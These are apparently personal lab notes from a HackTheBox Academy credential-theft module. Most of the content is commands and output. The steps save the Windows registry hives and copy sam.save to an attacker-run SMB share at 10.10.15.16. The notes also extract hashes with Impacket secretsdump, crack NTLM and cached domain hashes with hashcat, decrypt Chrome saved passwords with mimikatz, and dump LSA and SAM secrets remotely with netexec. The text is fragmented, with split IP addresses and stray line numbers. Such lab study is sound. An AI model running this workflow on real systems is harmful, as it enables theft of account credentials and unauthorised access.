cmd.exe with administrative privileges, we can use reg.exe to save copies of the registry hives.
To transfer
start local smb server: sudo
1
| python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
|
move from windows over
1
| C:\> move sam.save \\10.10.15.16\CompData
|
For secret dumping
locate secretsdump
1
| python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
|
pupulate file: sudo `` vim hashestocrack.txt crack: sudo hashcat -m 1000
1
| hashestocrack.txt /usr/share/wordlists/rockyou.txt
|
for cached hashes: hashcat -m 2100 ``
1
| '$DCC2$10240#administrator#23d97555681813db79b2ade4b4a6ff25'
|
1
| /usr/share/wordlists/rockyou.txt
|
DPAPI encrypted credentials can be decrypted manually with tools like Impacket’s dpapi, mimikatz, or remotely with DonPAPI.
1
2
3
4
5
6
7
8
9
10
11
| C:\Users\Public> mimikatz.exe
mimikatz # dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
* using CryptUnprotectData API
> AES Key is: efefdb353f36e6a9b7a7552cc421393daf867ac28d544e4f6f157e0a698e343c
URL: http://10.10.14.94/ ( http://10.10.14.94/login.html )
Username: bob
* using BCrypt with AES-256-GCM
Password: April2025!
|
Dumping LSA secrets remotely
netexec smb 10.129
1
| .42.198 --local-auth -u bob -p HTB_@cademy_stdnt
|
! --lsa
Dumping SAM Remotely
netexec smb 10.129
1
| .42.198 --local-auth -u bob -p HTB_@cademy_stdnt
|
! --sam